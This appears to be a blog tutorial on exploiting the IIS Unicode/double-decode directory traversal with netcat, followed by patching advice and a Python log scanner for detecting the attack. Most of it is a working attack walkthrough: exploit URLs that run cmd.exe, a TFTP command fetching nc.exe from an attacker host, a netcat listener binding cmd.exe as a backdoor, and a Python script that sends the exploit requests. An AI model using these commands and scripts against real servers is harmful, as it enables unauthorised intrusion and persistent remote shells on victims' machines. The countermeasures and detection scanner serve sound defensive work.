Netcat Tutorial | Directory Traversal Attack

In the last post we looked at the IIS directory traversal (Unicode / double-decode) vulnerability and what it is; in this netcat tutorial we will see how netcat can be used to exploit it. Before we proceed, be aware that this is one of the best-known attacks on IIS servers using netcat, and you will find this tutorial as-is in many books on hacking web servers, so if you have already read those this will be nothing new for you. Ok, let's proceed to the tutorial.
First of all you must be sure that the victim is running a vulnerable IIS version (IIS 4 or unpatched IIS 5), so after port-scanning the victim you will have to do some banner grabbing. You can grab the banner with netcat using the following command; once connected, type HEAD / HTTP/1.0 followed by a blank line and read the Server: header in the reply,
C:\>nc -v -n IP_address port_number
Once you have confirmed that the victim is running a vulnerable IIS server, it is time to check whether it accepts the malformed URL. Connect to port 80 with netcat as above and send the following request as a single line, followed by a blank line (the %255c form is the double-decode variant of the bug; the original Unicode variant uses ..%c0%af../ instead, and the rest of the URL is the same),
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0
If the reply contains a directory listing of C:\ (a Volume in drive ... / <DIR> listing) then the victim is vulnerable. Now it is time to upload netcat to the vulnerable server so it can be used as a backdoor. Netcat can be uploaded with TFTP: start a TFTP server on your own machine with nc.exe in its root directory (the victim must be able to reach you on UDP port 69), then embed the tftp command in the exploit URL. The -i switch selects binary transfer mode, and Attacker_IP is your own address, not the victim's,
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+tftp+-i+Attacker_IP+GET+nc.exe HTTP/1.0
Once netcat is uploaded we can use it as a backdoor (see the netcat tutorial on backdoors). Now run the following command on the victim through the same exploit URL, writing the spaces as + in the query string. -L makes the Windows build of netcat keep listening after a client disconnects, -p sets the port, -d detaches it from the console so it keeps running, and -e hands the connection to cmd.exe,
nc -L -p port -d -e cmd.exe
Once that is done, connect to the chosen port with nc -v -n IP_address port and you have a command shell on the victim.
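The probe-and-classify step above, as an added example that is not part of the original post: a small Python script that builds the same raw request you would type into the netcat session, shows why %255c slips past the server's check, and decides from the reply whether cmd.exe actually ran. The host and port are placeholders, the two sample replies are constructed here rather than captured from a real server, and probe() opens a real connection, so it is only for hosts you are authorised to test.

```python
import socket
import urllib.parse

# The traversal path used in this post. %255c decodes once to %5c and a second
# time to "\", so ..%255c..%255c walks two directories up from the /scripts
# virtual directory (assumed to sit under C:\Inetpub\scripts) to the drive root.
TRAVERSAL = "/scripts/..%255c..%255cwinnt/system32/cmd.exe"


def decode_twice(segment: str) -> str:
    """Show why %255c reaches cmd.exe: IIS decoded the path once for its
    security check (%255c -> %5c, no separator, check passes) and once more
    when building the filesystem path (%5c -> \\, traversal happens)."""
    first = urllib.parse.unquote(segment)
    return urllib.parse.unquote(first)


def build_probe_request(host: str, command: str = "dir c:\\") -> bytes:
    """Build the raw HTTP/1.0 request you would type into the netcat session.
    Everything after ?/c+ is handed to cmd.exe; spaces are written as '+'."""
    path = f"{TRAVERSAL}?/c+{command.replace(' ', '+')}"
    return f"GET {path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode("ascii")


def looks_vulnerable(response: bytes) -> bool:
    """Classify the raw reply: a 200 whose body is a Windows 'dir' listing
    ("Volume in drive", "<DIR>") means the path reached cmd.exe. Patched
    servers answer 404/403/500 without those strings."""
    text = response.decode("latin-1")
    status_line, _, rest = text.partition("\r\n")
    if " 200 " not in status_line:
        return False
    body = rest.partition("\r\n\r\n")[2]
    return "Volume in drive" in body or "<DIR>" in body


def probe(host: str, port: int = 80, timeout: float = 5.0) -> bool:
    """Send the probe over a TCP socket and classify the reply. Only use this
    against hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_probe_request(host))
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return looks_vulnerable(b"".join(chunks))


# Constructed sample replies (not captured from a real server) so the
# classifier can be exercised offline.
SAMPLE_VULNERABLE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Content-Type: application/octet-stream\r\n\r\n"
    b" Volume in drive C has no label.\r\n"
    b" Directory of c:\\\r\n\r\n"
    b"01/01/2001  12:00p      <DIR>          Inetpub\r\n"
    b"01/01/2001  12:00p      <DIR>          WINNT\r\n"
)
SAMPLE_PATCHED = (
    b"HTTP/1.1 404 Object Not Found\r\n"
    b"Server: Microsoft-IIS/5.0\r\n"
    b"Content-Type: text/html\r\n\r\n"
    b"<html><body>The page cannot be found</body></html>"
)

if __name__ == "__main__":
    print(build_probe_request("IP_address").decode())
    print("sample vulnerable reply ->", looks_vulnerable(SAMPLE_VULNERABLE))
    print("sample patched reply    ->", looks_vulnerable(SAMPLE_PATCHED))
```

The same builder produces the TFTP and netcat-launch requests from the post, for example build_probe_request(host, "tftp -i 10.0.0.1 GET nc.exe") with 10.0.0.1 standing in for your own machine, because everything after /c+ is passed straight to cmd.exe with + in place of spaces.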
Countermeasures:
-Update to Windows 2000 SP3 if you are still using Windows 2000 Server; if you cannot, at least apply the IIS hotfixes for the traversal bugs (MS00-078 for the Unicode variant, MS01-026 for the double-decode variant).
-Keep Windows Server 2003 / IIS 6 fully patched.
-Better still, upgrade the web server to IIS 7 or later.
-Remove the /scripts virtual directory and any other executable virtual directory you do not use; the exploit URL depends on one being present.
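For the defender, as an added example that is not from the original post: a Python scanner that walks IIS W3C-style log lines, decodes each requested path the way the vulnerable server did (twice) and flags double-encoded traversal, the overlong UTF-8 forms from the original Unicode bug, and requests for cmd.exe. The log lines are constructed for this example and use only a subset of the IIS fields; the encodings matched are the %255c form used in this post plus the %c0%af / %c1%9c overlong forms.

```python
import re
import urllib.parse
from dataclasses import dataclass
from typing import Dict, List, Optional

# Subset of the IIS W3C extended log fields used by the constructed sample below.
FIELDS = ["date", "time", "c-ip", "cs-method", "cs-uri-stem", "cs-uri-query", "sc-status"]

# Overlong UTF-8 forms of '/' and '\' accepted by unpatched IIS 4/5 (the original
# "Unicode" bug). A correct decoder rejects them, so they are matched on the raw path.
OVERLONG_RE = re.compile(r"%c0%af|%c1%9c", re.IGNORECASE)


@dataclass
class Alert:
    client: str
    reason: str
    raw_stem: str
    decoded_stem: str
    status: str


def norm(path: str) -> str:
    """Treat '\\' like '/' so '..\\' and '../' are both seen as traversal."""
    return path.replace("\\", "/")


def fully_decode(s: str, rounds: int = 3) -> str:
    """URL-decode until nothing changes. IIS decoded twice, so %255c -> %5c -> \\ ."""
    for _ in range(rounds):
        d = urllib.parse.unquote(s)
        if d == s:
            break
        s = d
    return s


def parse_line(line: str) -> Optional[Dict[str, str]]:
    """Split one log line into FIELDS; skip W3C '#' header lines and malformed lines."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(rec: Dict[str, str]) -> Optional[Alert]:
    """Return an Alert if the requested path looks like this traversal attack."""
    stem = rec["cs-uri-stem"]
    raw = norm(stem)
    once = norm(urllib.parse.unquote(stem))
    twice = norm(fully_decode(stem))
    reasons: List[str] = []
    if OVERLONG_RE.search(stem):
        reasons.append("overlong UTF-8 traversal")
    if "../" in raw:
        reasons.append("literal ../ in path")
    elif "../" in once:
        reasons.append("URL-encoded traversal")
    elif "../" in twice:
        # Only visible after a second decode: the %255c double-decode variant.
        reasons.append("double-URL-encoded traversal")
    if twice.lower().endswith("/cmd.exe"):
        reasons.append("cmd.exe requested")
    if not reasons:
        return None
    return Alert(rec["c-ip"], "; ".join(reasons), stem, twice, rec["sc-status"])


def scan(log_text: str) -> List[Alert]:
    """Run classify() over every parsable line and collect the alerts in order."""
    alerts: List[Alert] = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        alert = classify(rec)
        if alert is not None:
            alerts.append(alert)
    return alerts


# Constructed sample log (not from a real server): two probes using the post's
# %255c URL, one using the older %c0%af form against a patched host (404), and
# two ordinary requests that must not alert.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-05-20 10:01:02 10.0.0.9 GET /default.htm - 200
2001-05-20 10:01:05 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+dir+c:\\ 200
2001-05-20 10:01:09 10.0.0.9 GET /scripts/..%255c..%255cwinnt/system32/cmd.exe /c+tftp+-i+10.0.0.9+GET+nc.exe 200
2001-05-20 10:02:00 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\\ 404
2001-05-20 10:02:30 10.0.0.8 GET /images/logo.gif - 200
"""

if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(f"{a.client} {a.status} {a.reason}: {a.raw_stem} -> {a.decoded_stem}")
```

A 404 on the %c0%af line still earns an alert: the status tells you the patch held, but the client was probing for exactly this bug, and the next line from the same address is worth reading.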